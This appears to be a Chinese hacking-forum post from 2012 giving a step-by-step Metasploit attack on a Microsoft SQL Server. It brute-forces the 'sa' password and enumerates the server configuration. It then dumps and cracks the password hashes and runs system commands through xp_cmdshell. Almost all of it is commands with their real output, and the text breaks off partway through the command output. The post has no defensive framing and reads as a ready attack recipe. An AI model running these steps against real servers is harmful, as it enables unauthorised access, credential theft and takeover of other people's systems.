切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
302 MSF : Attack Mssql[复制链接]
发表于 2012-10-10 00:30:55 | 显示全部楼层 |!read_mode!
扫描版本
  1. msf > use auxiliary/scanner/mssql/mssql_login
  2. msf  auxiliary(mssql_login) > set RHOSTS 5.5.5.3
  3. RHOSTS => 5.5.5.3
  4. msf  auxiliary(mssql_login) > set PASS_FILE /tmp/pass
  5. PASS_FILE => /tmp/pass
  6. msf  auxiliary(mssql_login) > set RHOSTS 10
  7. RHOSTS => 10
  8. msf  auxiliary(mssql_login) > exploit

  9. [*] 5.5.5.3:1433 - MSSQL - Starting authentication scanner.
  10. [*] 5.5.5.3:1433 MSSQL - [1/8] - Trying username:'sa' with password:''
  11. [-] 5.5.5.3:1433 MSSQL - [1/8] - failed to login as 'sa'
  12. [*] 5.5.5.3:1433 MSSQL - [2/8] - Trying username:'sa' with password:'sa'
  13. [-] 5.5.5.3:1433 MSSQL - [2/8] - failed to login as 'sa'
  14. [*] 5.5.5.3:1433 MSSQL - [3/8] - Trying username:'sa' with password:'1'
  15. [-] 5.5.5.3:1433 MSSQL - [3/8] - failed to login as 'sa'
  16. [*] 5.5.5.3:1433 MSSQL - [4/8] - Trying username:'sa' with password:'2'
  17. [-] 5.5.5.3:1433 MSSQL - [4/8] - failed to login as 'sa'
  18. [*] 5.5.5.3:1433 MSSQL - [5/8] - Trying username:'sa' with password:'3'
  19. [-] 5.5.5.3:1433 MSSQL - [5/8] - failed to login as 'sa'
  20. [*] 5.5.5.3:1433 MSSQL - [6/8] - Trying username:'sa' with password:'4'
  21. [-] 5.5.5.3:1433 MSSQL - [6/8] - failed to login as 'sa'
  22. [*] 5.5.5.3:1433 MSSQL - [7/8] - Trying username:'sa' with password:'5'
  23. [-] 5.5.5.3:1433 MSSQL - [7/8] - failed to login as 'sa'
  24. [*] 5.5.5.3:1433 MSSQL - [8/8] - Trying username:'sa' with password:'123456'
  25. [+] 5.5.5.3:1433 - MSSQL - successful login 'sa' : '123456'
  26. [*] Scanned 1 of 1 hosts (100% complete)
  27. [*] Auxiliary module execution completed
  28. msf  auxiliary(mssql_login) >
复制代码

查看记录:
  1. msf  auxiliary(mssql_login) > creds

  2. Credentials
  3. ===========

  4. host     port  user  pass    type      active?
  5. ----     ----  ----  ----    ----      -------
  6. 5.5.5.3  1433  sa    123456  password  true

  7. [*] Found 1 credential.
  8. msf  auxiliary(mssql_login) >
复制代码

获得MSSQL信息
  1. msf  auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
  2. msf  auxiliary(mssql_enum) > exploit

  3. [*] Running MS SQL Server Enumeration...
  4. [*] Version:
  5. [*]        Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
  6. [*]                May  3 2005 23:18:38
  7. [*]                Copyright (c) 1988-2003 Microsoft Corporation
  8. [*]                Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
  9. [*] Configuration Parameters:
  10. [*]         C2 Audit Mode is Not Enabled
  11. [*]         xp_cmdshell is Enabled
  12. [*]         remote access is Enabled
  13. [*]         allow updates is Not Enabled
  14. [*]         Database Mail XPs is Enabled
  15. [*]         Ole Automation Procedures is Enabled
  16. [*] Databases on the server:
  17. [*]         Database name:master
  18. [*]         Database Files for master:
  19. [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
  20. [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\mastlog.ldf
  21. [*]         Database name:tempdb
  22. [*]         Database Files for tempdb:
  23. [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\tempdb.mdf
  24. [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\templog.ldf
  25. [*]         Database name:model
  26. [*]         Database Files for model:
  27. [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\model.mdf
  28. [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\modellog.ldf
  29. [*]         Database name:msdb
  30. [*]         Database Files for msdb:
  31. [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\MSDBData.mdf
  32. [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\MSDBLog.ldf
  33. [*]         Database name:pen
  34. [*]         Database Files for pen:
  35. [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\pen.mdf
  36. [*]                 C:\Program Files\Microsoft SQL Server\MSSQL\Data\pen_log.LDF
  37. [*] System Logins on this Server:
  38. [*]         sa
  39. [*]         BUILTIN\Administrators
  40. [*] System Admin Logins on this Server:
  41. [*]         BUILTIN\Administrators
  42. [*]         sa
  43. [*] Windows Logins on this Server:
  44. [*]         No Windows logins found!
  45. [*] Windows Groups that can logins on this Server:
  46. [*]         BUILTIN\Administrators
  47. [*] Accounts with Username and Password being the same:
  48. [*]         No Account with its password being the same as its username was found.
  49. [*] Accounts with empty password:
  50. [*]         No Accounts with empty passwords where found.
  51. [*] Stored Procedures with Public Execute Permission found:
  52. [*]         xp_getfiledetails
  53. [*]         xp_dirtree
  54. [*]         xp_fixeddrives
  55. [*]         xp_getnetname
  56. [*]         xp_enum_activescriptengines
  57. [*]         xp_fileexist
  58. [*]         xp_ntsec_enumdomains
  59. [*]         sp_getbindtoken
  60. [*]         sp_createorphan
  61. [*]         sp_droporphans
  62. [*]         sp_xml_preparedocument
  63. [*]         sp_xml_removedocument
  64. [*]         xp_unc_to_drive
  65. [*]         xp_MSplatform
  66. [*]         xp_grantlogin
  67. [*]         xp_IsNTAdmin
  68. [*]         xp_revokelogin
  69. [*]         xp_MSnt2000
  70. [*]         sp_prepexec
  71. [*]         sp_prepexecrpc
  72. [*]         sp_unprepare
  73. [*]         xp_MSLocalSystem
  74. [*]         sp_reset_connection
  75. [*]         sp_getschemalock
  76. [*]         sp_releaseschemalock
  77. [*]         sp_resyncprepare
  78. [*]         sp_resyncexecute
  79. [*]         sp_resyncexecutesql
  80. [*]         sp_resyncuniquetable
  81. [*]         sp_refreshview
  82. [*]         sp_replsetoriginator
  83. [*]         sp_replincrementlsn
  84. [*]         sp_repldone
  85. [*]         sp_repltrans
  86. [*]         sp_replcounters
  87. [*]         sp_replcmds
  88. [*]         sp_replpostschema
  89. [*]         xp_mergexpusage
  90. [*]         xp_showlineage
  91. [*]         sp_replsetsyncstatus
  92. [*]         xp_mapdown_bitmap
  93. [*]         xp_showcolv
  94. [*]         sp_replsendtoqueue
  95. [*]         sp_replwritetovarbin
  96. [*]         xp_regread
  97. [*]         xp_qv
  98. [*] Instances found on this server:
  99. [*]         MSSQLSERVER
  100. [*] Default Server Instance SQL Server Service is running under the privilege of:
  101. [*]         LocalSystem
  102. [*] Auxiliary module execution completed
  103. msf  auxiliary(mssql_enum) >
复制代码

获得用户密码
  1. msf  auxiliary(mssql_enum) > use auxiliary/scanner/mssql/mssql_hashdump
  2. msf  auxiliary(mssql_hashdump) > show options

  3. Module options (auxiliary/scanner/mssql/mssql_hashdump):

  4.    Name                 Current Setting  Required  Description
  5.    ----                 ---------------  --------  -----------
  6.    PASSWORD                              no        The password for the specified username
  7.    RHOSTS                                yes       The target address range or CIDR identifier
  8.    RPORT                1433             yes       The target port
  9.    THREADS              1                yes       The number of concurrent threads
  10.    USERNAME             sa               no        The username to authenticate as
  11.    USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

  12. msf  auxiliary(mssql_hashdump) > set PASSWORD 123456
  13. PASSWORD => 123456
  14. msf  auxiliary(mssql_hashdump) > set RHOSTS 5.5.5.3
  15. RHOSTS => 5.5.5.3
  16. msf  auxiliary(mssql_hashdump) > exploit

  17. [*] Instance Name: nil
  18. [+] 5.5.5.3:1433 - Saving mssql.hashes = sa:0100400f3764711bbab9342f3ecb2584417a7ecfd548a2ce2c61711bbab9342f3ecb2584417a7ecfd548a2ce2c61
  19. [*] Scanned 1 of 1 hosts (100% complete)
  20. [*] Auxiliary module execution completed
  21. msf  auxiliary(mssql_hashdump) >
复制代码

查看:
  1. msf  auxiliary(mssql_hashdump) > loot

  2. Loot
  3. ====

  4. host     service  type          name                        content     info           path
  5. ----     -------  ----          ----                        -------     ----           ----
  6. 5.5.5.3  mssql    mssql.hashes  5.5.5.3-1433_sqlhashes.txt  text/plain  MS SQL Hashes  /root/.msf4/loot/20120919231400_default_5.5.5.3_mssql.hashes_099023.txt

  7. msf  auxiliary(mssql_hashdump) >
复制代码

密码破解
如果有多个用户可以进行破解
  1. msf  auxiliary(mssql_hashdump) > use auxiliary/analyze/jtr_mssql_fast
  2. msf  auxiliary(jtr_mssql_fast) > exploit

  3. [*] Seeding wordlist with DB schema info... 0 words added
  4. [*] Seeding with MSSQL Instance Names....0 words added
  5. [*] Seeding with hostnames....0 words added
  6. [*] Seeding with found credentials....2 words added
  7. [*] Seeding with cracked passwords from John....0 words added
  8. [*] Seeding with default John wordlist...88395 words added
  9. [*] De-duping the wordlist....
  10. [*] Wordlist Seeded with 88395 words
  11. [*] Cracking MSSQL Hashes
  12. [*] HashList: /tmp/jtrtmp20120919-14021-ofr4sn
  13. [*] Trying Wordlist: /tmp/jtrtmp20120919-14021-13nrtm
  14. guesses: 1  time: 0:00:00:00 DONE (Wed Sep 19 23:15:06 2012)  c/s: 400  trying: SA - !@#$%^
  15. Use the "--show" option to display all of the cracked passwords reliably
  16. [*] Output: Loaded 1 password hash (MS-SQL [mssql SSE2])
  17. [*] Output: 123456           (sa)
  18. [*] Trying Rule: All4...
  19. [*] Output: Loaded 1 password hash (MS-SQL [mssql SSE2])
  20. [*] Output: No password hashes left to crack (see FAQ)
  21. [*] Trying Rule: Digits5...
  22. [*] Output: Loaded 1 password hash (MS-SQL [mssql SSE2])
  23. [*] Output: No password hashes left to crack (see FAQ)
  24. [*] sa:123456:5.5.5.3:1433

  25. [*]

  26. [*] 1 password hash cracked, 0 left

  27. [*] 1 hashes were cracked!
  28. [+] Host: 5.5.5.3 Port: 1433 User: sa Pass: 123456
  29. [*] Cracking MSSQL05 Hashes
  30. [*] Auxiliary module execution completed
  31. msf  auxiliary(jtr_mssql_fast) >
复制代码

执行函数命令
[code]msf > use auxiliary/admin/mssql/mssql_exec
msf  auxiliary(mssql_exec) > set CMD cmd.exe /c net user
CMD => cmd.exe /c net user
msf  auxiliary(mssql_exec) > set PASSWORD 123456
PASSWORD => 123456
msf  auxiliary(mssql_exec) > set RHOST 5.5.5.3
RHOST => 5.5.5.3
msf  auxiliary(mssql_exec) > exploit
  • SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c net user'



    output
    ------




    -------------------------------------------------------------------------------
    Administrator            ASPNET                   Guest                    
    IUSR_FUZZEXP-F60914C     IWAM_FUZZEXP-F60914C     SUPPORT_388945a0         
    \\
  • 操千曲而后晓声,观千剑而后识器。

    代码区

    GMT+8, 2020-12-2 14:15

    Powered by Discuz! X2

    © 2001-2018 Comsenz Inc.

    回顶部